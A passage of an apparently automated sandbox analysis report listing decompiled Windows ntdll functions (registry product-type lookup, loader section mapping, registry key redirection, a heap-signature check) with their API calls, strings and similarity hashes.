						E6ABF0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E6ABA97C0();
					}
					return E6ABAB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E6ABE3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E6ABE3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					memset( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E6ABA9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E6ABE3787(_a4,  &_v352, _t80);
						}
					}
					RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v1168);
				}
				_push(_v1156);
				E6ABA95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x6abe3552
0x6abe355a
0x6abe355d
0x6abe3566
0x6abe3567
0x6abe357e
0x6abe358f
0x6abe35a1
0x6abe35a5
0x6abe366b
0x6abe366b
0x6abe366d
0x6abe3672
0x6abe3679
0x6abe3685
0x6abe368d
0x6abe369d
0x6abe36a7
0x6abe36b8
0x6abe36c6
0x6abe36c7
0x6abe36dc
0x6abe36e1
0x6abe36e7
0x6abe36e9
0x6abe36e9
0x6abe3703
0x6abe3703
0x6abe35b5
0x6abe35c0
0x6abe35c4
0x00000000
0x00000000
0x6abe35ca
0x6abe35d7
0x6abe35e2
0x6abe35e6
0x6abe35e8
0x6abe35f5
0x6abe35fa
0x6abe3603
0x6abe3604
0x6abe3609
0x6abe360a
0x6abe3612
0x6abe3613
0x6abe361e
0x6abe3622
0x6abe3628
0x6abe362f
0x6abe362f
0x6abe3636
0x6abe3638
0x6abe363b
0x6abe3642
0x6abe3642
0x6abe3636
0x6abe3657
0x6abe3657
0x6abe365c
0x6abe3662
0x6abe3669
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlQueryPackageIdentityEx.1105(000000FC,?,?,00000000,00000000,00000000,?,?,00000000,?), ref: 6ABE359C

Part of subcall function 6ABA0BE0: RtlQueryPackageClaims.1105(00000000,?,00000000,?,00000000,?,?,00000000,?,00000000,?,00000000,?), ref: 6ABA0C14

memset.1105(?,00000000,00000050,?,?,000000FC,?,?,00000000,00000000,00000000,?,?,00000000,?), ref: 6ABE35F5
ZwQueryValueKey.1105(?,?,00000002,?,00000050,?,?,00000000,?), ref: 6ABE3619
RtlFreeHeap.1105(?,00000000,?,?,?,00000002,?,00000050,?,?,00000000,?), ref: 6ABE3657
ZwClose.1105(?,?,?,000000FC,?,?,00000000,00000000,00000000,?,?,00000000,?), ref: 6ABE3662
memset.1105(?,00000000,00000050,000000FC,?,?,00000000,00000000,00000000,?,?,00000000,?), ref: 6ABE3685
memset.1105(?,00000000,000002CC,?,00000000,?), ref: 6ABE36B8
RtlCaptureContext.1105(?,?,?,?,?,00000000,?), ref: 6ABE36C7
RtlReportException.1105(060C201E,?,00000002,?,?,?,?,?,00000000,?), ref: 6ABE36DC
ZwTerminateProcess.1105(000000FF,060C201E,060C201E,?,00000002,?,?,?,?,?,00000000,?), ref: 6ABE36E9

Part of subcall function 6ABE3971: ZwOpenKeyEx.1105(00000000,00020019,?,00000000,?,00000000), ref: 6ABE3A81

Part of subcall function 6ABE3884: ZwQueryValueKey.1105(?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6ABE38BF
Part of subcall function 6ABE3884: RtlAllocateHeap.1105(?,00000008,?,?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6ABE38E5

Strings

BinaryHash, xrefs: 6ABE358F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Query$memset$HeapPackageValue$AllocateCaptureClaimsCloseContextExceptionFreeIdentityOpenProcessReportTerminate
String ID: BinaryHash
API String ID: 428162740-2202222882
Opcode ID: 0f6f43a7bab666f5d208b7a7d9eebd7b9c585592d51d3783d7c7b5cfd28dbb4a
Instruction ID: 7f7c2547a1e9a3dd7281a44eaea169f2f2b99cff3211d1b9f42a120153e53c66
Opcode Fuzzy Hash: 0f6f43a7bab666f5d208b7a7d9eebd7b9c585592d51d3783d7c7b5cfd28dbb4a
Instruction Fuzzy Hash: 774182B1D0556C9FDB11CA60CC84FDEB77CEB44758F0145A5EA08AB251DF309E889F94

Uniqueness

Uniqueness Score: -1.00%

Function 6AC164FB, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 125
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6AC164FB(intOrPtr* __ecx) {
				signed int _v8;
				char _v32;
				short _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char* _v52;
				short _v54;
				void* _v56;
				char* _v60;
				char _v64;
				char* _v68;
				short _v70;
				char _v72;
				char* _v76;
				short _v78;
				void* _v80;
				char* _v84;
				short _v86;
				void* _v88;
				char* _v92;
				short _v94;
				void* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t48;
				short _t49;
				void* _t50;
				short _t51;
				void* _t55;
				void* _t62;
				void* _t77;
				short _t81;
				short _t82;
				intOrPtr* _t83;
				signed int _t85;

				_v8 =  *0x6ac5d360 ^ _t85;
				_t48 = 0x16;
				_t82 = 0x18;
				_t83 = __ecx;
				_v72 = _t48;
				_t77 = 0x10;
				_t49 = 0x12;
				_v86 = _t49;
				_v94 = _t49;
				_t50 = 0xa;
				_v80 = _t50;
				_t51 = 0xc;
				_v78 = _t51;
				_v112 =  &_v64;
				_push( &_v120);
				_v88 = _t77;
				_v96 = _t77;
				_push(1);
				_push( &_v48);
				_v64 = 0x840082;
				_v60 = L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\ProductOptions";
				_v70 = _t82;
				_v68 = L"ProductType";
				_v84 = L"LanmanNt";
				_v92 = L"ServerNt";
				_v76 = L"WinNt";
				_v48 = 0;
				_v120 = _t82;
				_v116 = 0;
				_v108 = 0x240;
				_v104 = 0;
				_v100 = 0;
				_t55 = E6ABA9600();
				_t84 = _t55;
				if(_t55 >= 0) {
					_push( &_v124);
					_push(0x24);
					_push( &_v44);
					_push(2);
					_push( &_v72);
					_push(_v48);
					_t62 = E6ABA9650();
					_t84 = _t62;
					if(_t62 >= 0) {
						if(_v40 != 1) {
							L10:
							_t84 = 0xc000090b;
						} else {
							_t81 = _v36;
							if(_t81 < 2) {
								goto L10;
							} else {
								_v54 = _t81;
								_v52 =  &_v32;
								_t35 = _t81 - 2; // 0x6abd6635
								_v56 = _t35;
								if(RtlEqualUnicodeString( &_v56,  &_v80, 1) == 0) {
									if(RtlEqualUnicodeString( &_v56,  &_v88, 1) == 0) {
										if(RtlEqualUnicodeString( &_v56,  &_v96, 1) == 0) {
											goto L10;
										} else {
											 *_t83 = 3;
										}
									} else {
										 *_t83 = 2;
									}
								} else {
									 *_t83 = 1;
								}
							}
						}
					}
				}
				if(_v48 != 0) {
					_push(_v48);
					E6ABA95D0();
				}
				return E6ABAB640(_t84, 1, _v8 ^ _t85, _t82, _t83, _t84);
			}

0x6ac1650a
0x6ac16512
0x6ac16515
0x6ac16518
0x6ac1651a
0x6ac1651e
0x6ac16521
0x6ac16524
0x6ac1652a
0x6ac1652f
0x6ac16532
0x6ac16536
0x6ac16537
0x6ac1653e
0x6ac16544
0x6ac16545
0x6ac1654c
0x6ac16552
0x6ac16553
0x6ac16554
0x6ac1655b
0x6ac16562
0x6ac16566
0x6ac1656d
0x6ac16574
0x6ac1657b
0x6ac16582
0x6ac16585
0x6ac16588
0x6ac1658b
0x6ac16592
0x6ac16595
0x6ac16598
0x6ac1659d
0x6ac165a1
0x6ac165aa
0x6ac165ab
0x6ac165b0
0x6ac165b1
0x6ac165b6
0x6ac165b7
0x6ac165ba
0x6ac165bf
0x6ac165c3
0x6ac165c8
0x6ac1662d
0x6ac1662d
0x6ac165ca
0x6ac165ca
0x6ac165d0
0x00000000
0x6ac165d2
0x6ac165d5
0x6ac165d9
0x6ac165dc
0x6ac165df
0x6ac165f3
0x6ac16609
0x6ac16623
0x00000000
0x6ac16625
0x6ac16625
0x6ac16625
0x6ac1660b
0x6ac1660b
0x6ac1660b
0x6ac165f5
0x6ac165f5
0x6ac165f5
0x6ac165f3
0x6ac165d0
0x6ac165c8
0x6ac165c3
0x6ac16636
0x6ac16638
0x6ac1663b
0x6ac1663b
0x6ac16652

APIs

ZwOpenKey.1105(?,00000001,?,00000124,00000000,00000000), ref: 6AC16598

Part of subcall function 6ABA9600: LdrInitializeThunk.NTDLL(6AB6ED52,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 6ABA960A

ZwQueryValueKey.1105(?,?,00000002,?,00000024,?,?,00000001,?,00000124,00000000,00000000), ref: 6AC165BA
RtlEqualUnicodeString.1105(?,?,00000001,?,?,00000002,?,00000024,?,?,00000001,?,00000124,00000000,00000000), ref: 6AC165EC
RtlEqualUnicodeString.1105(?,?,00000001,?,?,00000001,?,?,00000002,?,00000024,?,?,00000001,?,00000124), ref: 6AC16602
ZwClose.1105(00000000,?,00000001,?,00000124,00000000,00000000), ref: 6AC1663B

Strings

\Registry\Machine\System\CurrentControlSet\Control\ProductOptions, xrefs: 6AC1655B
WinNt, xrefs: 6AC1657B
ServerNt, xrefs: 6AC16574
ProductType, xrefs: 6AC16566
LanmanNt, xrefs: 6AC1656D

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: EqualStringUnicode$CloseInitializeOpenQueryThunkValue
String ID: LanmanNt$ProductType$ServerNt$WinNt$\Registry\Machine\System\CurrentControlSet\Control\ProductOptions
API String ID: 1342846649-2051245877
Opcode ID: 94b2a75aa7799ddb6157193a1e75e0406f32470d39c3ed47307d802168a093df
Instruction ID: ac5fbcc2aba92a2bb8b0db9e37c9c204351792d9cb387cd5a578cb83d7dbbb49
Opcode Fuzzy Hash: 94b2a75aa7799ddb6157193a1e75e0406f32470d39c3ed47307d802168a093df
Instruction Fuzzy Hash: 18416DB6D0564CAADF10CFE4D885ADEBBB8FF04304F50812AE615BB240EB719D05DB55

Uniqueness

Uniqueness Score: -1.00%

Function 6AB780FC, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 150
nativelibraryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6AB780FC(void* __ecx) {
				char _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				signed int* _v24;
				char _t41;
				void* _t53;
				void* _t58;
				signed int _t65;
				intOrPtr _t68;
				signed int* _t69;
				signed int _t75;
				void* _t77;
				signed int* _t78;
				intOrPtr _t79;
				void* _t80;
				void* _t81;

				_t77 = __ecx;
				_t79 =  *((intOrPtr*)(__ecx + 0x20));
				if(( *0x6ac55780 & 0x00000009) != 0) {
					_t31 = _t79 + 0x24; // 0x24
					E6ABE5510("minkernel\\ntdll\\ldrmap.c", 0x27b, "LdrpMinimalMapModule", 3, "DLL name: %wZ\n", _t31);
					_t81 = _t81 + 0x18;
				}
				_t4 = _t79 + 0x2c; // 0x2c
				_t41 = RtlEqualUnicodeString(_t4, 0x6ab4119c, 1);
				_v5 = _t41;
				_v16 = 0;
				_t65 = 0x800000;
				if(_t41 == 0) {
					_t61 =  *0x6ac579d8;
					if( *0x6ac579d8 != 0) {
						_v12 = 0;
						E6AB6C600(_t61,  *((intOrPtr*)(_t79 + 0x30)), 4,  &_v12, 4, 0);
						if(_v12 != 0 && E6ABFB8D0(0x6ab4e420, 1, 0,  &_v16) >= 0) {
							_t65 = 0x20000000;
						}
					}
				}
				_t68 =  *[fs:0x18];
				 *(_t77 + 0x5c) =  *(_t77 + 0x5c) & 0x00000000;
				_v12 = _t68;
				_v20 =  *((intOrPtr*)(_t68 + 0x14));
				 *((intOrPtr*)(_t68 + 0x14)) =  *((intOrPtr*)(_t79 + 0x28));
				_t75 =  *(_t77 + 0x10) & 0x00800000;
				if(_t75 != 0) {
					_t65 = _t65 | 0x00040000;
				}
				_t15 = _t79 + 0x18; // 0x18
				_t69 = _t15;
				_v24 = _t69;
				_push(2 + (0 | _t75 == 0x00000000) * 2);
				_push(_t65);
				_push(1);
				_push(_t77 + 0x5c);
				_push(0);
				_push(0);
				_push(0);
				_push(_t69);
				_push(0xffffffff);
				_push( *((intOrPtr*)(_t77 + 0xc)));
				_t80 = E6ABA9780();
				 *((intOrPtr*)(_v12 + 0x14)) = _v20;
				if(_t65 == 0x20000000) {
					E6ABFC450(_v16);
				}
				_t53 = _t80 - 0x40000003;
				if(_t53 == 0) {
					L13:
					if( *((intOrPtr*)(_t77 + 0x60)) == 0) {
						if(E6AB90548(_t77, 1) == 0) {
							if(_v5 != 0) {
								_t80 = 0xc0000018;
							}
						} else {
							_t80 = 0xc000022d;
						}
					}
				} else {
					_t58 = _t53 - 0xb;
					if(_t58 == 0) {
						_t80 = E6ABEA6DE(_t77);
						L8:
						_t78 = _v24;
						if( *_t78 != 0 && (_t80 < 0 || _t80 == 0x4000000e)) {
							_push( *_t78);
							_push(0xffffffff);
							E6ABA97A0();
							 *_t78 =  *_t78 & 0x00000000;
						}
						if(( *0x6ac55780 & 0x00000009) != 0) {
							E6ABE5510("minkernel\\ntdll\\ldrmap.c", 0x302, "LdrpMinimalMapModule", 4, "Status: 0x%08lx\n", _t80);
						}
						return _t80;
					}
					if(_t58 == 0x28) {
						goto L13;
					}
				}
			}

0x6ab7810e
0x6ab78110
0x6ab78113
0x6abc99dc
0x6abc99f6
0x6abc99fb
0x6abc99fb
0x6ab78120
0x6ab78124
0x6ab7812b
0x6ab7812e
0x6ab78131
0x6ab78138
0x6ab7813a
0x6ab78141
0x6abc9a06
0x6abc9a13
0x6abc9a1c
0x6abc9a3c
0x6abc9a3c
0x6abc9a1c
0x6ab78141
0x6ab78147
0x6ab7814e
0x6ab78152
0x6ab78158
0x6ab7815e
0x6ab78164
0x6ab7816a
0x6abc9a46
0x6abc9a46
0x6ab78172
0x6ab78172
0x6ab78177
0x6ab78184
0x6ab78185
0x6ab78186
0x6ab7818b
0x6ab7818e
0x6ab7818f
0x6ab78190
0x6ab78191
0x6ab78192
0x6ab78194
0x6ab7819f
0x6ab781a4
0x6ab781ad
0x6abc9a54
0x6abc9a54
0x6ab781b5
0x6ab781ba
0x6ab781f4
0x6ab781f8
0x6ab78205
0x6ab78220
0x6ab78222
0x6ab78222
0x6ab78207
0x6ab78207
0x6ab78207
0x6ab78205
0x6ab781bc
0x6ab781bc
0x6ab781bf
0x6abc9a65
0x6ab781ca
0x6ab781ca
0x6ab781d0
0x6ab7820e
0x6ab78210
0x6ab78212
0x6ab78217
0x6ab78217
0x6ab781e5
0x6abc9a83
0x6abc9a88
0x6ab781f3
0x6ab781f3
0x6ab781c8
0x00000000
0x00000000
0x6ab781c8

APIs

RtlEqualUnicodeString.1105(0000002C,6AB4119C,00000001,?,00000000,?,?,6AB77F7A,?,00000000,?,00000060,000014A5,?,00000000,00000024), ref: 6AB78124
ZwMapViewOfSection.1105(?,000000FF,00000018,00000000,00000000,00000000,00000000,00000001,00800000,00000000,0000002C,6AB4119C,00000001,?,00000000), ref: 6AB78197
ZwUnmapViewOfSection.1105(000000FF,?,?,000000FF,00000018,00000000,00000000,00000000,00000000,00000001,00800000,00000000,0000002C,6AB4119C,00000001), ref: 6AB78212
LdrQueryImageFileKeyOption.1105(?,?,00000004,00000000,00000004,00000000,0000002C,6AB4119C,00000001,?,00000000,?,?,6AB77F7A,?,00000000), ref: 6ABC9A13
RtlAcquirePrivilege.1105(6AB4E420,00000001,00000000,?,?,?,00000004,00000000,00000004,00000000,0000002C,6AB4119C,00000001,?,00000000), ref: 6ABC9A2F

Strings

Status: 0x%08lx, xrefs: 6ABC9A6D
LdrpMinimalMapModule, xrefs: 6ABC99E7, 6ABC9A74
DLL name: %wZ, xrefs: 6ABC99E0
minkernel\ntdll\ldrmap.c, xrefs: 6ABC99F1, 6ABC9A7E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView$AcquireEqualFileImageOptionPrivilegeQueryStringUnicodeUnmap
String ID: DLL name: %wZ$LdrpMinimalMapModule$Status: 0x%08lx$minkernel\ntdll\ldrmap.c
API String ID: 3505501266-1759440706
Opcode ID: a328f5be4096b76c888e1ed05c58e8af4a0af01c6c0f16cf70debd67c23dc006
Instruction ID: 8dbc0a1eb924898ff6aab66d4ca149b1229294f8650b7190cbaee418840434f2
Opcode Fuzzy Hash: a328f5be4096b76c888e1ed05c58e8af4a0af01c6c0f16cf70debd67c23dc006
Instruction Fuzzy Hash: 6441F5719042C4BFEB21CA94CC44FAE7BB4EB05718F010619EA25A7591EFB1D980F7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6AC3F019, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 105
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E6AC3F019(intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				void* _t39;
				intOrPtr _t55;
				long _t56;
				intOrPtr* _t63;
				intOrPtr _t64;
				void* _t65;

				_v12 = _v12 & 0x00000000;
				_t55 = __edx;
				_t64 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				RtlInitUnicodeString( &_v40, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\CommonGlobUserSettings\\");
				_t63 = _a8;
				_t56 = E6AC3F13B(_t64, _t55,  &_v40, _t63,  &_v12);
				if(_t56 >= 0 && _v12 == 2) {
					_t56 = 0;
					_v16 = 0;
					_v8 = 0;
					RtlInitUnicodeString( &_v32, L"RedirectedKey");
					_t39 =  *0x6ab46cc8( *_t63,  &_v32, 2, 0, 0,  &_v8);
					if(_v8 > 0 && (_t39 == 0xc0000023 || _t39 == 0x80000005)) {
						_t65 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _v8);
						if(_t65 != 0) {
							_push( &_v8);
							_push(_v8);
							_push(_t65);
							_push(2);
							_push( &_v32);
							_push( *_t63);
							if( *0x6ab46cc8() >= 0 &&  *((intOrPtr*)(_t65 + 4)) == 1) {
								_t22 = _t65 + 0xc; // 0xc
								RtlInitUnicodeString( &_v48, _t22);
								if(E6AC3F13B(_v24, _v20,  &_v48,  &_v16,  &_v12) >= 0) {
									 *0x6ab46cc4( *_t63);
									 *_t63 = _v16;
								}
							}
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t65);
						}
					}
				}
				return _t56;
			}

0x6ac3f021
0x6ac3f030
0x6ac3f032
0x6ac3f035
0x6ac3f038
0x6ac3f03b
0x6ac3f041
0x6ac3f056
0x6ac3f05a
0x6ac3f072
0x6ac3f075
0x6ac3f078
0x6ac3f07b
0x6ac3f08f
0x6ac3f098
0x6ac3f0c3
0x6ac3f0c7
0x6ac3f0cc
0x6ac3f0cd
0x6ac3f0d3
0x6ac3f0d4
0x6ac3f0d6
0x6ac3f0d7
0x6ac3f0e1
0x6ac3f0e9
0x6ac3f0f1
0x6ac3f110
0x6ac3f114
0x6ac3f11d
0x6ac3f11d
0x6ac3f110
0x6ac3f12b
0x6ac3f12b
0x6ac3f0c7
0x6ac3f098
0x6ac3f138

APIs

RtlInitUnicodeString.1105(?,\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\,00020019,00000000,00000000,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F03B

Part of subcall function 6AC3F13B: ZwOpenKey.1105(?,00020019,?,?,00020019,00000000), ref: 6AC3F182
Part of subcall function 6AC3F13B: ZwCreateKey.1105(?,00020019,00000018,00000000,00000000,00000000,6AC3F056), ref: 6AC3F19F

RtlInitUnicodeString.1105(00020019,RedirectedKey,?,?,00000000,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F07B
ZwQueryValueKey.1105(?,00020019,00000002,00000000,00000000,?,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F08F
RtlAllocateHeap.1105(?,00000008,?,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F0BE
ZwQueryValueKey.1105(?,00020019,00000002,00000000,?,?,?,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F0D9
RtlInitUnicodeString.1105(?,0000000C,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F0F1
ZwClose.1105(?,?,?,00000002,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F114
RtlFreeHeap.1105(?,00000000,00000000,?,00000000,?,?,00020019,?,6AC16114), ref: 6AC3F12B

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 6AC3F02B
RedirectedKey, xrefs: 6AC3F06A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitStringUnicode$HeapQueryValue$AllocateCloseCreateFreeOpen
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 1683559675-1388552009
Opcode ID: 7a5c2f50db1527a5ebceaaacf740f3609c242ff70e216ad8777c9bb3a2a5a0d9
Instruction ID: bb944bbb69ceb851c7e4e5c783356e29b78711789a79e8101f684a131a7139c4
Opcode Fuzzy Hash: 7a5c2f50db1527a5ebceaaacf740f3609c242ff70e216ad8777c9bb3a2a5a0d9
Instruction Fuzzy Hash: 23310775A01119AFDB10DF94D984E9EBBBCFF08314F108466E601E7211EB709E45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB640E1, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E6AB640E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6AB6B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E6AB6B150(", passed to %s", _t29);
					}
					_push("\n");
					E6AB6B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6ac56378 = 1;
						asm("int3");
						 *0x6ac56378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x6ab640e6
0x6ab640e8
0x6ab640f1
0x6abc042d
0x6abc044c
0x6abc0451
0x6abc042f
0x6abc0444
0x6abc0449
0x6abc045d
0x6abc0466
0x6abc046e
0x6abc0474
0x6abc0475
0x6abc047a
0x6abc048a
0x6abc048c
0x6abc0493
0x6abc0494
0x6abc0494
0x00000000
0x6abc049b
0x00000000

APIs

DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,6AC238D6), ref: 6ABC0444
DbgPrint.1105(Invalid heap signature for heap at %p,?,?,?,?,?,?,?,6AC238D6), ref: 6ABC045D
DbgPrint.1105(, passed to %s,RtlGetUserInfoHeap,?,?,?,?,?,?,6AC238D6), ref: 6ABC046E
DbgPrint.1105(6AB46B94,?,?,?,?,?,?,6AC238D6), ref: 6ABC047A

Strings

RtlGetUserInfoHeap, xrefs: 6ABC0468
, passed to %s, xrefs: 6ABC0469
Invalid heap signature for heap at %p, xrefs: 6ABC0458
HEAP[%wZ]: , xrefs: 6ABC043F
HEAP: , xrefs: 6ABC044C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlGetUserInfoHeap
API String ID: 3558298466-609737958
Opcode ID: d1f6aef925258fab5f153aa267d802d264b4137a28c400f06e9d1e5064fa1f5b
Instruction ID: 396e4f97af730ebcc2e6c9ab93b48d0c4691db3639cdea9b817da46953ee0569
Opcode Fuzzy Hash: d1f6aef925258fab5f153aa267d802d264b4137a28c400f06e9d1e5064fa1f5b
Instruction Fuzzy Hash: 590147B7025AC0BED2198B68D82DF4777F4DB01B38F1A8029F10947642DF649880F122

Uniqueness

Uniqueness Score: -1.00%

Function 6AB66800, Relevance: 16.9, APIs: 11, Instructions: 373
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E6AB66800(void* __ebx, void* __edi, void* __esi, void** _a4, signed short* _a8, intOrPtr _a12, signed short* _a16, signed short* _a20, void* _a24, intOrPtr* _a28, intOrPtr* _a32, intOrPtr* _a36, intOrPtr* _a40, signed char _a44) {
				char _v5;
				void* _v12;
				void _v16;
				int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t131;
				intOrPtr* _t132;
				int _t153;
				long _t154;
				void* _t158;
				void _t162;
				void* _t194;
				int _t196;
				void* _t205;
				void* _t206;
				signed short* _t207;
				void* _t209;
				signed int _t211;
				intOrPtr* _t212;
				signed short* _t213;
				signed int _t215;
				signed short* _t217;
				void* _t219;
				void _t228;
				void _t229;
				signed int _t238;
				intOrPtr _t256;
				void* _t262;
				short _t268;
				intOrPtr _t269;
				signed int _t271;
				void* _t272;
				intOrPtr* _t273;
				void* _t275;
				intOrPtr* _t276;
				long _t278;
				void* _t279;

				_t275 = __esi;
				_t272 = __edi;
				_t205 = __ebx;
				if((_a44 & 0xfffffffe) != 0) {
					L61:
					return 0xc000000d;
				}
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				if(E6AB66BF3(_a8) < 0) {
					goto L61;
				}
				_t256 = _a12;
				_t215 = 0;
				if(_t256 != 0) {
					_t124 = E6AB66BF3(_t256);
					_t215 = 0;
				} else {
					_t124 = 0;
				}
				if(_t124 < 0) {
					goto L61;
				} else {
					_push(_t205);
					_v5 = _t215;
					_v32 = _t215;
					_t217 = _a16;
					_t206 = 0x5c;
					if(_t217 == 0) {
						L12:
						_t207 = _a20;
						if(_t207 == 0) {
							_t125 = 0;
						} else {
							_t125 = E6AB66BF3(_t207);
						}
						if(_t125 < 0) {
							L65:
							_t126 = 0xc000000d;
							goto L53;
						} else {
							_t218 = _a28;
							if(_a28 == 0) {
								_t219 = 0;
								_t127 = 0;
							} else {
								_t127 = E6AB66BF3(_t218);
								_t219 = 0;
							}
							if(_t127 < 0) {
								goto L65;
							} else {
								_t128 = _a32;
								if(_a32 == 0) {
									_t129 = _t219;
								} else {
									_t129 = E6AB66BF3(_t128);
									_t219 = 0;
								}
								if(_t129 < 0) {
									goto L65;
								} else {
									_push(_t275);
									_t276 = _a36;
									if(_t276 == 0) {
										_t130 = _t219;
									} else {
										_t130 = E6AB66BF3(_t276);
										_t219 = 0;
									}
									if(_t130 < 0) {
										_t126 = 0xc000000d;
										goto L52;
									} else {
										_push(_t272);
										_t273 = _a40;
										if(_t273 == 0) {
											_t131 = _t219;
										} else {
											_t131 = E6AB66BF3(_t273);
										}
										if(_t131 < 0) {
											_t126 = 0xc000000d;
											goto L51;
										} else {
											if(_t207 == 0) {
												_t207 = _a8;
												_a20 = _t207;
											}
											_t132 = _a28;
											if(_t132 == 0) {
												_t132 = 0x6ab41ab0;
